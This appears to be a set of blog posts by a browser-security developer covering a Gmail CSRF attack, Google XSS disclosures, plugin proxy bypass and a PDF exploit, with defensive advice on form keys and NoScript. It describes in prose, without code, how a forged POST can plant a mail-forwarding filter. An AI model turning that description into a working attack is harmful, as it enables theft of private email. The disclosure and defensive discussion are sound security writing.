The basic concept, not terribly new by the way, is that browser proxy settings cannot be enforced on browser plugins, which happily ignore them in some circumstances, e.g. when establishing a direct TCP socket connection.
So if you’re using a proxy to hide your internet address (like Tor users do), embeddable objects like Java applets can betray you, revealing your real identity to advertisers spying on your habits or, worse, to the police of a repressive state.
ActionScript object is used to bypass browser’s proxy setting and connect to a tiny server written in Perl, listening on port 9999 and echoing client’s IP.
Victim must visit a malicious web page: most likely scenarios are clicking an external link from an incoming message or surfing porn while checking email from time to time.
The malicious web site forges a POST request to GMail’s “Create Filter” wizard, possibly using an autosubmit invisible form to build a filter which forwards incoming messages to a mail recipient owned by the attacker.
Since user is already authenticated, her session cookie is passed along with the forged request and the GMail filter gets silently implanted, with all the output hidden inside an IFRAME.
The new GMail filter now acts as a persistent backdoor stealing incoming messages, and it will go unnoticed forever unless the victim is a power GMail user who creates or edits from time to time her own filters, which are deep buried in the “Settings” user interface: I, for instance, never saw them until yesterday!
Very clever and very dangerous.
As I said, this surely counts as a 0day public full disclosure: no matter if pdp omitted an explicit PoC. How many of us, having minimal web coding experience, wouldn’t be able to build a working exploit using the info above?
As usual, now that’s been publicly disclosed, this vulnerability is being patched very quickly by the great Google development crew.
Nonetheless, many other holes of this kind are still around. That’s why CSRF is called “The Sleeping Giant”: some web coders may still need to learn how to fix or prevent them, and users surely want to know how to protect themselves.
1. Web Developers
Please use form keys!
Generate a random identifier (form key) every time you display a form meant to be submitted by authenticated users only.
Echo your key as an hidden field of the form and bind its value to the user session data kept on the server side.
As soon the form is submitted, compare the returned key with the one stored in session data: if they don’t match, throw away the request because it is probably forged.
The above is a simple yet effective anti-CSRF technique. It will work fine unless a further Cross Site Scripting (XSS) vulnerability is present too, allowing attacker to read your form key on the fly and forge a seemingly valid requests.
2. Web Users
This GMail incident proves how even the best trained web developer in the world can fail at implementing CSRF countermeasures.
Most of the existing literature about XSS and CSRF will tell you that poor users can do nothing to protect themselves from these attacks, but this is blatantly false.
A quite radical, not very usable but effective approach would be using different browsers (or different profiles, if you use Mozilla derivatives) for each “sensitive” web site you access, and force yourself not to follow any external link nor browse any other site while logged in.
Anyway, if you prefer not to make your life miserable by spawning multiple browsers and scanning every single link with a magnifying lens, your answer is, once again, Firefox + NoScript (sorry to sound repetitive, but that’s it).
— but just impossible if malicious scripts are blocked by NoScript.
The obvious objection, raised for instance by both pdp and Adrian Pastor at GNUCITIZEN, sounds like:
True, but NoScript effectively defeats this attack as well!
It certainly does, but NoScript actually enhances browser security in several other ways.
A very incomplete list:
It prevents malformed URIs to exploit buggy URI handlers, i.e. the foundation for many cross-application exploits discovered by Billy Rios, Nate McFeters and Thor Larholm.
It implements the most advanced and effective anti-XSS protection available on the client side.
One of them also provides an effective defense from CSRFs of the kind affecting GMail: in facts, NoScript intercepts POST requests sent from untrusted origins to trusted sites and strips out their payloads.
This means that, even if the attacker exploits a scriptless vector to launch his POST CSRF through social engineering, NoScript users are still safe as long as the malicious site is not explicitly whitelisted.
Giorgio, sounds good, but doesn’t that break things?
I mean, CSRF is one of the most fundamental Web characteristic.
Disabling it might be OK for people like us, but for the general population, that is a no go!
Petko, my friend,
The very foundation of the Web is CSR (Cross Site Requests, AKA Hyperlinking), not CSRF (Cross Site Request Forgery) which is an unwanted side effect of bad coding practices.
RFC 2616 defining HTTP (hence, in a certain sense, the Web itself), clearly states that while GET requests (the ones we generate by following hyperlinks or submitting a search form) are idempotent, i.e. should not modify the receiving system, POST is reserved to requests which cause a permanent change. NoScript just prevents untrusted sites from modifying data held by trusted sites, and this looks Pure Good™: why could you want the contrary?
Even if you actually wanted the contrary, you can either use the “Unsafe reload” command, available whenever a request is filtered by NoScript, or permanently configure some sites of your choice as unfiltered recipients of unsafe requests by listing them in NoScript Options/Advanced/XSS/Exceptions
The NoScript feature we’re talking about has been in place for more than six month now.
I guess it’s transparent enough if security researchers like you, Adrian or .mario — people “like us”, much more attentive to what happens inside their browsers than “the general population” — did not even notice it… ;)
Not a great month for Google security.
In the past 3 days, 34 interesting disclosures have been published:
Google Search Appliance XSS discovered by MustLive, affecting almost 200,000 paying customers of the outsourced search engine and their users: this Google dork shown 196,000 results at the time of disclosure, now dropped to 188,000. Fear effect?
Billy Rios and Nate McFeters revealed the gory details of their already announced Picasa exploit, leveraging a clever combo of XSS, Cross Application Request Forgery, Flash same domain policy elusion and URI handler weakness exploitation to steal your private pictures, straight from your local hard disk, just visiting a malicious web page.
Finally, the most simple yet impressive, because of the huge number of users involved: beford decided to launch his new blog disclosing a Google Polls XSS which, thanks to the (too) smart “widget reuse” allowing Google services to integrate the same functionality across multiple services, can be used to attack Search, Blogspot, Groups and, the most dramatic exploitation scenario, GMail:
For such an attack to be successful, the victim just needs to visit a malicious website while logged in Google, e.g. by following a link from an incoming message (unless she’s got anti-XSS protection).
update — a few hours after I released the first version of article, I heard of another Google-outsourced vulnerability, an Urchin Login XSS disclosed by GNUCITIZEN’s Adrian Pastor, which could compromise local Google Analytics installations. Its severity may vary depending on how Urchin is installed (e.g. on a domain different than your main site), but the provided proof of concept is quite interesting because it shows an actual credential theft in action, rather than the usual, boring
. Not that a more spectacular example proves anything new about the dangers of XSS, but some people just don’t believe until they can see with their own eyes.
These vulnerabilities are surely being fixed at top speed, since Google is one of the most reactive organizations in this fight, but they’re nonetheless disturbing because they hit the very main player on the field, with the largest user base on the web: this make this kind of incidents unavoidable ipso facto.
How many vulnerabilities like those just go undisclosed and unpatched, but yet exploited by unethical hacrackers?
In Gareth Heyes‘ words,
This proves everything is insecure, there are just degrees of insecurity.
Talking about XSS, if you’re an end user and you don’t like to stay at the very bottom of the insecurity food chain, you’d better use Firefox with NoScript — but that’s your choice, of course. ;)
The Google Search Appliance starts at $30,000, whereas the Mini starts at $1,995.
This means that about 196.000 web sites, many of them belonging to very important Universities and other public bodies, are willing to pay for putting their data and their users at risk.
Last time I checked, putting up a self-hosted search engine was not a terribly hard task, no matter if you prefer Java, PHP or just plain CGI.
When you discover your own web site is broken, do you really want to depend on someone else for a fix?
Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one.
I’ve got no problem with believing his words, since the stuff we keep calling “documents” became containers for all kinds of executable code long time ago, either intentionally (script embedding) or by accident (buffer overflows, often due to an overly complex format driven by creeping featurism).
I (like many people, I guess) do have problems with his suggested work-around:
My advise for you is not to open any PDF files (locally or remotely).
This is something no business can afford, plain and simple.
The real fix would be vendors stopping with these crazy mixes of data and code, but it’s something they seem not even considering.
So, how can we mitigate risks of this kind, which surely won’t go away even when Adobe will fix this specific PDF issue?
OK, I’m obviously biased here, but did you ever notice the
It provides quite a flexible way to block Java, Flash, Silverlight and all the other plugins such as Acrobat Viewer, Windows Media Player and QuickTime, just to name the ones featured in pdp’s researches.
If you check all the
checkboxes but the last (IFRAMES), all types of plugin-handled, potentially dangerous content will be blocked by default if coming from unknown (and therefore untrusted) sites.
You’ll get a nice placeholder with the NoScript logo instead: you just click it, and you activate the content on the fly if you deem it’s trustworthy.
If you’re a paranoid like me, you may want to trade some usability for maximum security and check also the
Apply these restrictions to trusted sites too
option, which will mandate on-demand activation everywhere.
I heard someone saying
security × usability = K
If it’s true (and I hope some day it won’t necessarily be), NoScript tries hard to pump that